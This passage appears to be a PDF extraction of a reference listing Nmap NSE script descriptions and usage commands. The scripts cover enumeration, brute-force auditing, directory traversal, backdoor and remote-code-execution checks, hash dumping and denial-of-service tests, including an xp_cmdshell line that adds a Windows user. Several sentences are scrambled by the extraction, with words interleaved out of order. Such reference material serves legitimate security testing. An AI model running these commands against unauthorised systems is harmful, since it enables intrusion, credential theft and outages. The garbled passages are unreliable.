description = Attempts to discover multihomed systems by analysing and comparing information collected by other scripts. The information analyzed currently includes, SSL certificates, SSH host keys, MAC addresses, and Netbios server names.

@usage sudo nmap -PN -p445,443 --script duplicates,nbstat,ssl-cert

description = Attempts to enumerate process info over the Apple Remote Event protocol.

@usage nmap -p 3031 --script eppc-enum-processes


2 71


description = Detects a vulnerability in netfilter and other firewalls that use helpers to dynamically open ports for protocols such as ftp and sip. For more information, see: *

http://home.regit.org/2012/03/playing-with-network-layers-tobypass-firewalls-filtering-policy/

@usage nmap --script firewall-bypass nmap

--script firewall-bypass --script-args firewallbypass.helper="ftp", firewall-bypass.targetport=22

description = Retrieves information from Flume master HTTP pages.

@usage nmap --script flume-master-info -p 35871 host

description = Performs brute force password auditing against FTP servers.

@usage nmap --script ftp-brute -p 21 description = Tests for the presence of the ProFTPD 1.3.3c backdoor reported as OSVDB-ID 69562. This script attempts to


2 72


exploit the backdoor using the innocuous id command by default, but that can be changed with the ftp-proftpdbackdoor.cmd script argument.

@usage nmap --script ftp-proftpd-backdoor -p 21

description = Tests for the presence of the vsFTPd 2.3.4 backdoor reported on 2011-07-04 (CVE-2011-2523). This script attempts to exploit the backdoor using the innocuous id command by default, but that can be changed with the exploit.cmd or ftp-vsftpd-backdoor.cmd script arguments. References: *

http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpddownload-backdoored.html

* https://dev.metasploit.com/redmine/projects/framework/re pository/revisions/13093 * http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=CVE-2011-2523

@usage nmap --script ftp-vsftpd-backdoor -p 21


2 73


description = Retrieves GPS time, coordinates and speed from the GPSD network daemon.

@usage nmap -p 2947 --script gpsd-info description = Reads hard disk information (such as brand, model, and sometimes temperature) from a listening hddtemp service.

@usage nmap -p 7634 -sV -sC

description = Discovers hostnames that resolve to the target's IP address by querying the Robtex service at http://www.robtex.com/dns/.

@usage nmap --script hostmap-robtex

description = Grabs affiliate network IDs (e.g. Google AdSense or Analytics, Amazon Associates, etc.) from a web page. These can be used to identify pages with the same owner.

@usage -- nmap --script=http-affiliate-id.nse --script-args http-affiliateid.url-path=/website


2 74


description = Exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it (CVE: 2008-3922). References: * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE2008-3922 * http://www.exploit-db.com/exploits/17324/

@usage nmap -sV --script http-awstatstotals-exec.nse --script-args 'httpawstatstotals-exec.cmd="uname -a", httpawstatstotals-exec.uri=/awstats/index.php' -- nmap -sV --s cript http-awstatstotals-exec.nse

description = Exploits a directory traversal vulnerability in Apache Axis2 version 1.4.1 by sending a specially crafted request to the parameter xsd (OSVDB-59001).

@usage nmap -p80,8080 --script http-axis2-dir-traversal --script-args 'http-axis2-dir-traversal.file=../../../../../../../etc/issue' nmap -p80 --script http-axis2-dir-traversal

description = Attempts to retrieve the configuration settings from a Barracuda Networks Spam & Virus Firewall device using the directory traversal vulnerability described at


2 75


http://seclists.org/fulldisclosure/2010/Oct/119.

@usage nmap --script http-barracuda-dir-traversal --script-args httpmax-cache-size=5000000 -p description = Performs brute force password auditing against http basic authentication. @usage nmap --script http-brute -p 80

description = Obtains the CakePHP version of a web application built with the CakePHP framework by fingerprinting default files shipped with the CakePHP framework.

@usage nmap -p80,443 --script http-cakephp-version

description = Attempts to enumerate the hashed Domino Internet Passwords that are (by default) accessible by all authenticated users. This script can also download any Domino ID Files attached to the Person document.

@usage nmap --script domino-enum-passwords -p 80 --script-args domino-enum-passwords.username='patrik karlsson',domino-enum-passwords.password=secret


2 76


description = Enumerates Drupal users by exploiting a an information disclosure vulnerability in Views, Drupal's most popular module.For more information,see: * http://www.madirish.net/node/465

@usage nmap --script=http-drupal-enum-users --script-args http-drupalenum-users.root="/path/"

description = Enumerates the installed Drupal modules by using a list of known modules.

@usage nmap --script=http-drupal-modules --script-args http-drupalmodules.root="/path/",http-drupalmodules.number=1000

description = Spiders a web site and collects e-mail addresses.

@usage nmap --script=http-email-harvest

description = Spiders a site's images looking for interesting exif data embedded in .jpg files. Displays the make and model of the camera, the date the photo was taken, and the embedded geotag information.


2 77


@usage nmap --script http-exif-spider -p80,443

description = Performs brute force password auditing against http form-based authentication.

@usage nmap --script http-form-brute -p 80

description = Checks whether target machines are vulnerable to anonymous Frontpage login.

@usage nmap -p 80 --s cript=http-frontpage-login

description = Retrieves the locations of all "Find my iPhone" enabled iOS devices by querying the MobileMe web service (authentication required).

@usage nmap -sn -Pn --script http-icloud-findmyiphone --scriptargs='username=,password='


2 78


description = Checks for a vulnerability in IIS 5.1/6.0 that allows arbitrary users to access secured WebDAV folders by searching for a password-protected folder and attempting to access it. This vulnerability was patched in Microsoft Security Bulletin MS09-020, http://nmap.org/r/ms09-020.

@usage nmap --script http-iis-webdav-vuln -p80,8080

description = Performs brute force password auditing against Joomla web CMS installations.

@usage nmap

-sV --script http-joomla-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-joomlabrute.hostname=domain.com,

http-joomla-brute.threads=3,brute.firstonly=true' nmap -sV --script http-joomla-brute

description = Exploits a directory traversal vulnerability existing in Majordomo2 to retrieve remote files.

@usage nmap -p80 --script http-majordomo2-dir-traversal


2 79


description = Spiders a website and attempts to identify open redirects. Open redirects are handlers which commonly take a URL as a parameter and responds with a http redirect (3XX) to the target. Risks of open redirects are described at http://cwe.mitre.org/data/definitions/601.html.

@usage nmap --script=http-open-redirect

description = Checks if a web server is vulnerable to directory traversal by attempting to retrieve /etc/passwd or \boot.ini.

@usage nmap --script http-passwd --script-args http-passwd.root=/test/

description= Crawls a web server and attempts to find PHP files vulnerable to reflected cross site scripting via the variable $_SERVER["PHP_SELF"]. This script crawls the webserver to create a list of PHP files and then sends an attack vector/probe to identify PHP_SELF cross site scripting vulnerabilities.

@usage nmap --script=http-phpself-xss -p80


2 80


nmap -sV --script http-self-xss

description = Performs brute force password guessing against HTTP proxy servers.

@usage nmap --script http-proxy-brute -p 8080

description = Crawls webservers in search of RFI (remote file inclusion) vulnerabilities. It tests every form field it finds and every parameter of a URL containing a query.

@usage nmap --script http-rfi-spider -p80

description = Finds up to 100 domain names which use the same name server as the target by querying the Robtex service at http://www.robtex.com/dns/.

@usage nmap --script http-robtex-shared-ns

description = Spiders a web server and displays its directory structure along with number and types of files in each folder. Note


2 81


that files listed as having an 'Other' extension are ones that have no extension or that are a root document.

@usage nmap --script http-sitemap-generator -p 80 description = Tests a web server for vulnerability to the Slowloris DoS attack by launching a Slowloris attack. Slowloris was described at Defcon 17 by RSnake (see http://ha.ckers.org/slowloris/).

@usage nmap --script http-slowloris --max-parallelism 400

description = Tests a web server for vulnerability to the Slowloris DoS attack without actually launching a DoS attack. Slowloris was described at Defcon 17 by RSnake (see http://ha.ckers.org/slowloris/).

@usage nmap --script http-slowloris-check


2 82


description = Sends an HTTP TRACE request and shows if the method TRACE is enabled. If debug is enabled, it returns the header fields that were modified in the response.

@usage nmap --script http-trace -d

description = Exploits the Max-Forwards HTTP header to detect the presence of reverse proxies.

@usage nmap --script=http-traceroute

description = Spiders a website and attempts to identify output escaping problems where content is reflected back to the user. This script locates all parameters, ?x=foo&y=bar and checks if the values are reflected on the page.

@usage nmap --script=http-unsafe-output-escaping

description number = Searches web requests virtual hostnames by making large of for HEAD against http serversa using common hostnames.


2 83


@usage nmap --script http-vhosts -p 80,8080,443

description = Checks whether a file has been determined as malware by Virustotal. Virustotal is a service that provides the capability to scan a file or check a checksum against a number of the major antivirus vendors. The script uses the public API which requires a valid API key and has a limit on 4 queries per minute. A key can be acquired by registering as a user on the virustotal web page: http://www.virustotal.com

@usage nmap

--script http-virustotal --scriptargs='apikey="",checksum="275a021bbfb6489e 54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f "'

description = Connects to a VLC Streamer helper service and lists directory contents. The VLC Streamer helper service is used by the iOS VLC Streamer application to enable streaming of multimedia content from the remote server to the device.

@usage nmap -p 54340 --script http-vlcstreamer-ls


2 84


description = Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733).

@usage nmap --script http-vmware-path-vuln -p80,443,8222,8333 description = Executes a directory traversal attack against a ColdFusion server and tries to grab the password hash for the administrator user.

@usage nmap --script http-vuln-cve2010-2861

description = Tests for the CVE-2011-3368 (Reverse Proxy Bypass) vulnerability in Apache HTTP server's reverse proxy mode. The script will run 3 tests: o the loopback test, with 3 payloads to handle different rewrite rules o the internal hosts test. According to Contextis, we expect a delay before a server error. References: http://www.contextis.com/research/blog/reverseproxybypass/ @usage

nmap --script http-vuln-cve2011-3368


2 85


description = Detects PHP-CGI installations that are vulnerable to CVE-2012-1823, This critical vulnerability allows attackers to retrieve source code and execute code remotely.

@usage nmap -sV --script http-vuln-cve2012-1823 nmap -p80 --script http-vuln-cve2012-1823 --script-args httpvuln-cve2012-1823.uri=/test.php

description = Tries to detect the presence of a web application firewall and its type and version.

@usage nmap --script=http-waf-fingerprint nmap

--script=http-waf-fingerprint --script-args fingerprint.intensive=1

http-waf-

description = Enumerates usernames in Wordpress blog/CMS installations by exploiting an information disclosure vulnerability existing in versions 2.6, 3.1, 3.1.1, 3.1.3 and 3.2-beta2 and possibly others. Original advisory: *

http://www.talsoft.com.ar/index.php/research/securityadvisories/wordpress-user-id-and-user-name-disclosure


2 86


@usage nmap -p80 --script http-wordpress-enum nmap -sV --script http-wordpress-enum --script-args limit=50 description = Tries to obtain a list of installed WordPress plugins by brute force testing for known plugins.

@usage nmap

--script=http-wordpress-plugins --script-args httpwordpress-plugins.root="/blog/",http-wordpressplugins.search=500

description = Performs brute force password auditing against the Asterisk IAX2 protocol.

@usage nmap -sU -p 4569 --script iax2-brute

description = Tests a list of known ICAP service names and prints information Protocol about any it detects. Internet Content Adaptation (ICAP) is usedThe to extend transparent proxy servers and is generally used for content filtering and antivirus scanning.


2 87


@usage nmap -p 1344 --script icap-info

description = Performs brute force password auditing against IMAP servers using either LOGIN, PLAIN, CRAM-MD5, DIGEST-MD5 or NTLM authentication.

@usage nmap -p 143,993 --script imap-brute

description = Performs brute force password auditing against IBM Informix Dynamic Server.

@usage nmap --script informix-brute -p 9088

description = Runs a query against IBM Informix Dynamic Server using the given authentication credentials (see also: informix-brute).

@usage nmap -p 9088 --script informix-query --script-args informix-query.username=informix,informixquery.password=informix


2 88


description = Retrieves a list of tables and column definitions for each database on an Informix server.

@usage nmap -p 9088 --script informix-tables --script-args informix-tables.username=informix,informixtables.password=informix

description = Detects whether the remote device has ip forwarding or "Internet connection sharing" enabled, by sending an ICMP echo request to a given target using the scanned host as default gateway.

@usage sudo nmap -sn --script ip-forwarding --scriptargs='target=www.example.com'

description = Tries to identify the physical location of an IP address using the Geobytes geolocation web service (http://www.geobytes.com/iplocator.htm).

@usage nmap --script ip-geolocation-geobytes description = Tries to identify the physical location of an IP address using the Geoplugin geolocation web service


2 89


(http://www.geoplugin.com/). There is no limit on lookups using this service.

@usage nmap --script ip-geolocation-geoplugin description = Tries to identify the physical location of an IP address using a Geolocation Maxmind database file (available from http://www.maxmind.com/app/ip-location). This script supports queries using all Maxmind databases that are supported by their API including the commercial ones.

@usage nmap --script ip-geolocation-maxmind [--script-args ipgeolocation.maxmind_db=]

description = Classifies a host's IP ID sequence (test for susceptibility to idle scan).

@usage nmap --script ipidseq [--script-args probeport=port] target @args probeport Set destination port to probe


2 90


description = Obtains hostnames, IPv4 and IPv6 addresses through IPv6 Node Information Queries.

@usage nmap -6 description = Checks an IRC server for channels that are commonly used by malicious botnets.

@usage nmap -p 6667 --script=irc-botnet-channels @usage nmap -p 6667 --script=irc-botnet-channels --script-args 'ircbotnet-channels.channels={chan1,chan2,chan3}'

description= Performs brute force password auditing against IRC (Internet Relay Chat) servers.

@usage nmap --script irc-brute -p 6667

description= Performs brute force password auditing against IRC (Internet Relay Chat) servers supporting SASL authentication.


2 91


@usage nmap --script irc-sasl-brute -p 6667

description = Lists portals and iSCSI nodes registered with the Internet Storage Name Service (iSNS).

@usage nmap -p 3205 --script isns-info

description = Attempts to exploit java's remote debugging port. When remote debugging port is left open, it is possible to inject java bytecode and achieve remote code execution. This script abuses this to inject and execute a Java class file that executes the supplied shell command and returns its output.

@usage nmap -sT -p --script=+jdwp-exec -script-args cmd="date"

description = Attempts to exploit java's remote debugging port. When remote debugging port is left open, it is possible to inject java bytecode and achieve remote code execution. This script injects and execute a Java class file that returns remote system information.

@usage nmap -sT -p --script=+jdwp-info


2 92


description = Attempts to exploit java's remote debugging port. When remote debugging port is left open, it is possible to inject java bytecode and achieve remote code execution. This script allows injection of arbitrary class files.

@usage nmap -sT -p --script=+jdwp-inject -script-args filename=HelloWorld.class

description = Discovers valid usernames by brute force querying likely usernames against a Kerberos service.

@usage nmap -p 88 --script krb5-enum-users --script-args krb5-enumusers.realm='test'

description = Attempts to brute-force LDAP authentication. By default it uses the built-in username and password lists. In order to use your own lists use the userdb and passdb script arguments.

@usage nmap -p 389 --script ldap-brute --script-args \ ldap.base='"cn=users,dc=cqure,dc=net"' @usage nmap -p 636 --script ldap-novell-getpass --script-args \ 'ldap-novell-getpass.username="CN=admin,O=cqure", \


2 93


ldap-novell-getpass.password=pass1234, \ ldap-novell-getpass.account="CN=paka,OU=hr,O=cqure"'

description = Retrieves the LDAP root DSA-specific Entry (DSE)

@usage nmap -p 389 --script ldap-rootdse

description = Attempts to perform an LDAP search and returns all matches.

@usage nmap

-p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=n et",ldap.password=ldaptest,

-- ldap.qfilter=users,ldap.attrib=sAMAccountName'

description = Resolves a hostname by using the LLMNR (Link-Local Multicast Name Resolution) protocol. * http://technet.microsoft.com/en-us/library/bb878128.aspx

@usage nmap

--script llmnr-resolve --script-args resolve.hostname=examplename' -e wlan0


'llmnr-

2 94


description = Uses the Microsoft LLTD protocol to discover hosts on a local network. For more information on the LLTD protocol please refer to http://www.microsoft.com/whdc/connect/Rally/LLTD-spec.mspx @usage

nmap -e --script lltd-discovery

description = Retrieves version and database information from a SAP Max DB database.

@usage nmap -p 7210 --script maxdb-info

description = Performs brute force password auditing against Couchbase Membase servers.

@usage nmap -p 11211 --script membase-brute

description = Retrieves information (hostname, OS, uptime, etc.) from the CouchBase Web Administration port.

@usage nmap -p 8091 --script membase-http-info ww w. cl ub ed oh ack er .c om .b r

2 95


description = Retrieves information (including system architecture, process ID, and server time) from distributed memory object caching system memcached.

@usage nmap -p 11211 --script memcached-info

description = Gathers info from the Metasploit rpc service. It requires a valid login pair. After authentication it tries to determine Metasploit version and deduce the OS type. Then it creates a new console and executes few commands to get additional info. References:http://wiki.msgpack.org/display/MSGPACK/Format+spe cification https://community.rapid7.com/docs/DOC-1516 Metasploit RPC API Guide

@usage nmap

--script=metasploit-info username=root,password=root

--script-args

description = Performs brute force username and password auditing against Metasploit msgrpc interface.


2 96


@usage nmap --script metasploit-msgrpc-brute -p 55553

description= Performs brute force password auditing against a Metasploit RPC server using the XMLRPC protocol.

@usage nmap --script metasploit-xmlrpc-brute -p 55553

description = Performs brute force password auditing against the RPA Tech Mobile Mouse servers.

@usage nmap --script mobilemouse-brute -p 51010

description = Connects to an RPA Tech Mobile Mouse server, starts an application and sends a sequence of keys to it. Any application that the user has access to can be started and the key sequence is sent to the application after it has been started.

@usage nmap -p 51010 --script mmouse-exec \ --script-args application='/bin/sh',keys='ping -c 5 127.0.0.1'


2 97


description = Enumerates SCADA Modbus slave ids (sids) and collects their device information.

@usage nmap

--script modbus-discover.nse --script-args='modbusdiscover.aggressive=true' -p 502

description = Performs brute force password auditing against the MongoDB database.

@usage nmap -p 27017 --script mongodb-brute

description = Attempts to get a list of tables from a MongoDB database.

@usage nmap -p 27017 --script mongodb-databases

description = Attempts to get build info and server status from a MongoDB database.

@usage nmap -p 27017 --script mongodb-info


2 98


description = Queries targets for multicast routing information.

@usage nmap --script mrinfo nmap --script mrinfo -e eth1 nmap --script mrinfo --script-args 'mrinfo.target=172.16.0.4'

description = Queries an MSRPC endpoint mapper for a list of mapped services and displays the gathered information.

@usage nmap --script=msrpc-enum

description = Performs password guessing against Microsoft SQL Server (ms-sql). Works best in conjunction with the broadcast-ms-sql-discover script.

@usage nmap -p 445 --script ms-sql-brute --script-args mssql.instanceall,userdb=customuser.txt,passdb=custompass.txt nmap

-p

1433

--script

ms-sql-brute

--script-args

userdb=customuser.txt,passdb=custompass.txt


2 99


description = Queries Microsoft SQL Server (ms-sql) instances for a list of databases, linked servers, and configuration settings.

@usage nmap -p 1433 --script ms-sql-config --script-args mssql.username=sa,mssql.password=sa

description = Queries the Microsoft SQL Browser service for the DAC (Dedicated Admin Connection) port of a given (or all) SQL Server instance. The DAC port is used to connect to the database instance when normal connection attempts fail, for example, when server is hanging, out of memory oranin other states.access In addition, the DAC port provides adminbadwith to system objects otherwise not accessible over normal connections.

@usage sudo nmap -sU -p 1434 --script ms-sql-dac

description = Dumps the password hashes from an MS-SQL server in a format suitable for cracking by tools such as John-theripper. In order to do so the user needs to have the appropriate DB privileges.

@usage nmap -p 1433 --script ms-sql-dump-hashes


3 00


description = Attempts to authenticate to Microsoft SQL Servers using an empty password for the sysadmin (sa) account.

@usage nmap -p 445 --script ms-sql-empty-password --script-args mssql.instance-all nmap -p 1433 --script ms-sql-empty-password

description = Queries Microsoft SQL Server (ms-sql) instances for a list of databases a user has access to.

@usage nmap

-p

1433 --script ms-sql-hasdbaccess --script-args mssql.username=sa,mssql.password=sa

description = Attempts to determine configuration and version information for Microsoft SQL Server instances.

@usage nmap -p 445 --script ms-sql-info nmap -p 1433 --script ms-sql-info --script-args mssql.instanceport=1433


3 01


description = Runs a query against Microsoft SQL Server (ms-sql).

@usage nmap

-p

1433

--script

ms-sql-query

--script-args

mssql.username=sa,mssql.password=sa,ms-sqlquery.query="SELECT * FROM master..syslogins"

description = Queries Microsoft SQL Server (ms-sql) for a list of tables per database.

@usage nmap

-p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=sa

description = Attempts to run a command using the command shell of Microsoft SQL Server (ms-sql).

@usage nmap -p 445 --script ms-sql-discover,ms-sql-empty-password,mssql-xp-cmdshell -- nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xpcmdshell.cmd="net user test test /add"


3 02


description = Audits MySQL database server security configuration against parts of the CIS MySQL v1.0.2 benchmark (the engine can be used for other MySQL audits by creating appropriate audit files).

@usage nmap -p 3306 --script mysql-audit --script-args "mysqlaudit.username='root', \ --mysql-audit.password='foobar',mysqlaudit.filename='nselib/data/mysql-cis.audit'"

description = Performs password guessing against MySQL.

@usage nmap --script=mysql-brute

description = Dumps the password hashes from an MySQL server in a format suitable for cracking by tools such as John the Ripper. Appropriate DB privileges (root) are required.

@usage nmap -p 3306 --script mysql-dump-hashes --scriptargs='username=root,password=secret' description = Runs a query against a MySQL database and returns the results as a table.


3 03


@usage nmap

-p 3306 --script mysql-query --scriptargs='query=""[,username=,pass word=]'

description = Attempts to bypass authentication in MySQL and MariaDB servers by exploiting CVE2012-2122. If its vulnerable, it will also attempt to dump the MySQL usernames and password hashes. Original public advisory: * http://seclists.org/oss-sec/2012/q2/493 Interesting post about this vuln: https://community.rapid7.com/community/metasploit/blog/2012/06/1 1/cve-2012-2122-a-tragically-comedic-security-flaw-inmysql

@usage nmap -p3306 --script mysql-vuln-cve2012-2122 @usage nmap -sV --script mysql-vuln-cve2012-2122

description = Attempts to retrieve the target's NetBIOS names and MAC address. By default, the script displays the name of the computer and the logged-in user; if the verbosity is turned up, it displays all names the system thinks it owns.


3 04


@usage sudo nmap -sU --script nbstat.nse -p137 @usage nmap -p 10000 --script ndmp-fs-info

description= Performs brute force password auditing against a Nessus vulnerability scanning daemon using the NTP 1.2 protocol.

@usage nmap --script nessus-brute -p 1241

description = Checks if a NetBus server is vulnerable to an authentication bypass vulnerability which allows full access without knowing the password.

@usage nmap -p 12345 --script netbus-auth-bypass

description = Performs brute force password auditing against the Netbus backdoor ("remote administration") service.

@usage nmap -p 12345 --script netbus-brute


3 05


description = Opens a connection to a NetBus server and extracts information about the host and the NetBus service itself.

@usage nmap -p 12345 --script netbus-info --script-args netbusinfo.password=

description = Extends version detection to detect NetBuster, a honeypot service that mimes NetBus. @usage nmap -sV -p 12345 --script netbus-version

description= Performs brute force password auditing against a Nexpose vulnerability scanner using the API 1.1. By default it only tries three guesses per username to avoid target account lockout.

@usage nmap --script nexpose-brute -p 3780

description = Performs brute force password auditing against an Nping Echo service. See http://nmap.org/book/npingman-echo-mode.html for Echo Mode documentation.


3 06


@usage nmap -p 9929 --script nping-brute

description = Queries Nagios Remote Plugin Executor (NRPE) daemons to obtain information such as load averages, process counts, logged in user information, etc.

@usage nmap --script nrpe-enum -p 5666

description = Obtains and prints an NTP server's monitor data.

@usage nmap -sU -pU:123 -Pn -n --script=ntp-monlist

description = Performs brute force password auditing against the OpenVAS manager using OMPv2.

@usage nmap -p 9390 --script omp2-brute

description = Attempts to retrieve the list of target systems and networks from an OpenVAS Manager server. ww w. cl ub ed oh ack er .c om .b r

3 07


@usage nmap -p 9390 --script omp2-brute,omp2-enum-targets @usage nmap

-p

9390 --script omp2-enum-targets --script-args omp2.username=admin,omp2.password=secret

description = Parses and displays the banner information of an OpenLookup (network key-value store) server.

@usage nmap -p 5850 --script openlookup-info

description = Performs brute force password auditing against Oracle servers.

@usage nmap --script oracle-brute -p 1521 --script-args oraclebrute.sid=ORCL

description = Exploits the CVE-2012-3137 vulnerability, a weakness in Oracle'sO5LOGIN authentication scheme

@usage


3 08


nmap --script oracle-brute-stealth -p 1521 --script-args oraclebrute-stealth.sid=ORCL

description = Attempts to enumerate valid Oracle user names against unpatched Oracle 11g servers (this bug was fixed in Oracle's October 2009 Critical Patch Update).

@usage nmap --script oracle-enum-users --script-args oracle-enumusers.sid=ORCL,userdb=orausers.txt -p 1521-1560

description = Guesses Oracle instance/SID names against the TNSlistener.

@usage nmap

--script=oracle-sid-brute --scriptargs=oraclesids=/path/to/sidfile -p 1521-1560

nmap --script=oracle-sid-brute -p 1521-1560

description = Performs simple Path MTU Discovery to target hosts. described in RFC 1191 and required by RFC 1812)

@usage nmap --script path-mtu target


3 09


description = Performs brute force password auditing against the pcAnywhere remote access protocol.

@usage nmap --script=pcanywhere-brute description = Performs password guessing against PostgreSQL.

@usage nmap -p 5432 --script pgsql-brute

description = Retrieves or sets the ready message on printers that support the Printer Job Language. This includes most PostScript printers that listen on port 9100.

@usage nmap --script=pjl-ready-message.nse \ --script-args='pjl_ready_message="your message here"'

description = Repeatedly probe open and/or closed ports on a host to obtain a series of round-trip time values for each port. See http://hcsw.org/nmap/QSCAN for more on Doug's research


3 10


@usage nmap

--script qscan --script-args qscan.confidence=0.95,qscan.delay=200ms,qscan.numt rips=10 target

description = Extracts information from a Quake3 game server and other games which use the same protocol.

@usage nmap -sU -sV -Pn --script quake3-info.nse -p

description = Determines which Security layer and Encryption level is supported by the RDP service. It does so by cycling through all existing protocols and ciphers. The script was inspired by MWR's RDP Cipher Checker http://labs.mwrinfosecurity.com/tools/2009/01/12/rdpcipher-checker/

@usage nmap -p 3389 --script rdp-enum-encryption

description vulnerability. = Checks if aThe machine is vulnerable MS12-020 RDP Microsoft bulletin to MS12-020 patches two vulnerabilities: CVE-2012-0152 which addresses a denial of service vulnerability inside Terminal Server, and CVE-2012-0002 which fixes a vulnerability in Remote


3 11


Desktop Protocol. Both are part of Remote Desktop Services. References: * http://technet.microsoft.com/en-us/security/bulletin/ms12-020 * http://support.microsoft.com/kb/2621440 * http://zerodayinitiative.com/advisories/ZDI-12-044/ * http://aluigi.org/adv/termdd_1-adv.txt

@usage nmap -sV --script=rdp-ms12-020 -p 3389

description = Performs brute force passwords auditing against a Redis key-value store.

@usage nmap -p 6379 --script redis-brute

description = Retrieves information (such as version number and architecture) from a Redis key-value store.

@usage nmap -p 6379 --script redis-info


3 12


description = Resolves hostnames and adds every address (IPv4 or IPv6, depending on Nmap mode) to Nmap's target list. This differs from Nmap's normal host resolution process, which only scans the first address (A or AAAA record) returned for each host name.

@usage nmap

--script=resolveall --scriptargs=newtargets,resolveall.hosts={, ...} ...

-- @args resolveall.hosts Table of hosts to resolve

description = Creates a reverse index at the end of scan output showing which hosts run a particular service. This is in addition each host.to Nmap's normal output listing the services on

@usage nmap --script reverse-index

description= Performs brute force password auditing against the classic UNIX rexec (remote exec) service.

@usage nmap -p 512 --script rexec-brute


3 13


description = Retrieves information (such as node name and architecture) from a Basho Riak distributed database using the HTTP protocol.

@usage nmap -p 8098 --script riak-http-info

description= Performs brute force password auditing against the classic UNIX rlogin (remote login) service. This script must be run in privileged mode on UNIX because it must bind to a low source port number.

@usage nmap -p 513 --script rlogin-brute

description = Connects to a remote RMI registry and attempts to dump all of its objects.

@usage nmap --script "rmi-dumpregistry.nse" -p 1098

description = Tests whether Java rmiregistry allows class loading. The default configuration of rmiregistry allows loading classes fromThe remote URLs, which can lead to remote execution. vendor (Oracle/Sun)classifies this code as a design feature.


3 14


References: http://dev.metasploit.com/redmine/projects/framework/rep ository/entry/modules/exploits/multi/misc/java_rmi_serve r.rb

@usage nmap --script=rmi-vuln-classloader -p 1099

description = Performs brute force password auditing against the WinPcap Remote Capture Daemon (rpcap).

@usage nmap -p 2002 --script rpcap-brute

description = Connects to the rpcap service (provides remote sniffing capabilities through WinPcap) and retrieves interface information. The service can either be setup to require authentication or not and also supports IP restrictions.

@usage nmap -p 2002 --script rpcap-info nmap

-p

2002

--script

rpcap-info

--script-

args="creds.rpcap='administrator:foobar description = Fingerprints the target RPC port to extract the target service, RPC number and version.


3 15


@usage nmap -sV nmap --script rpc-grind nmap --script rpc-grind --script-args 'rpc-grind.threads=8' -p --

description = Performs brute force password auditing against the rsync remote file syncing protocol.

@usage nmap

-p

873 --script rsync-brute brute.module=www'

--script-args

'rsync-

description = Lists modules available for rsync (remote file sync) synchronization.

@usage nmap -p 873 --script rsync-list-modules

description = Determines which methods are supported by the RTSP (real time streaming protocol) server.

@usage nmap -p 554 --script rtsp-methods


3 16


description = Attempts to enumerate RTSP media URLS by testing for common paths on devices such as surveillance IP cameras.

@usage nmap --script rtsp-url-brute -p 554

description = Checks if target machines are vulnerable to the Samba heap overflow vulnerability CVE-2012-1182. References: * https://bugzilla.samba.org/show_bug.cgi?id=8815 * http://www.samba.org/samba/security/CVE-2012-1182

@usage nmap --script=samba-vuln-cve-2012-1182 -p 139

description = Performs brute force password auditing against Session Initiation Protocol (SIP http://en.wikipedia.org/wiki/Session_Initiation_Protocol) accounts.

@usage nmap -sU -p 5060 --script=sip-brute


3 17


description = Spoofs a call to a SIP phone and detects the action taken by the target (busy, declined, hung up, etc.)

nmap --script=sip-call-spoof -sU -p 5060 nmap --script=sip-call-spoof -sU -p 5060 --script-args 'sip-call-spoof.ua=Nmap, sip-call-spoof.from=Boss'

description = Enumerates a SIP server's valid extensions (users).

@usage nmap --script=sip-enum-users -sU -p 5060

description = Enumerates a SIP Server's allowed methods (INVITE, OPTIONS, SUBSCRIBE, etc.)

@usage nmap --script=sip-methods -sU -p 5060

description = Attempts to guess username/password combinations over SMB, storing discovered combinations for use in other scripts. Every attempt will be made to get a valid list of users and to verify each username before actually using them. When a username is discovered, besides being printed, it is also saved in the Nmap registry so other Nmap scripts can use it.


3 18


@usage nmap --script smb-brute.nse -p445 sudo nmap -sU -sS --script smb-brute.nse -p U:137,T:139

description = Checks for vulnerabilities: * MS08-067, a Windows RPC vulnerability * Conficker, an infection by the Conficker worm * Unnamed regsvc DoS, a denialof-service vulnerability I accidentally found in Windows 2000 * SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497) * MS06-025, a Windows Ras RPC service vulnerability * MS07-029, a Windows Dns Server RPC service vulnerability

@usage nmap --script smb-check-vulns.nse -p445 sudo nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139

description their = Attempts to enumerate domains on a system, alongexcept with policies. This generally requires credentials, against Windows 2000. In addition to the actual domain, the "Builtin" domain is generally displayed.


3 19


@usage nmap --script smb-enum-domains.nse -p445 sudo

nmap

-sU

-sS

--script smb-enum-domains.nse

-p

U:137,T:139 description = Obtains a list of groups from the remote Windows system, as well as a list of the group's users.

@usage nmap --script smb-enum-users.nse -p445 sudo nmap -sU -sS --script smb-enum-users.nse -p U:137,T:139

description = Pulls a list of processes from the remote server over SMB. This will determine all running processes, their process IDs, and their parent processes. It is done by querying the remote registry service, which is disabled by default on Vista; on all other Windows versions, it requires Administrator privileges.

@usage nmap --script smb-enum-processes.nse -p445 sudo nmap -sU -sS --script smb-enum-processes.nse -p U:137,T:139


3 20


description = Enumerates the users logged into a system either locally or through an SMB share. The local users can be logged on either physically on the machine, or through a terminal services session.

@usage nmap --script smb-enum-sessions.nse -p445 sudo nmap -sU -sS --script smb-enum-sessions.nse -p U:137,T:139

description

= Attempts to list shares srvsvc.NetShareEnumAll function and

using the MSRPC

retrieve

more information about them srvsvc.NetShareGetInfo.

using

@usage nmap --script smb-enum-shares.nse -p445 sudo nmap -sU -sS --script smb-enum-shares.nse -p U:137,T:139

description = Exhausts a remote SMB server's connection limit by by opening as many connections as we can.


3 21


@usage nmap --script smb-flood.nse -p445 sudo nmap -sU -sS --script smb-flood.nse -p U:137,T:139

description = Attempts to retrieve useful information about files shared on SMB volumes. The output is intended to resemble the output of the UNIX ls command.

@usage nmap

-p 445 --script 'share=c$,path=\temp'

smb-ls

--script-args

description= Queries information managed by the Windows Master Browser.

@usage nmap -p 445 --script smb-mbenum

description = Attempts to determine the operating system, computer name, domain, workgroup, and current time over the SMB protocol (ports 445 or 139). http://www.skullsecurity.org/blog/?p=76.


3 22


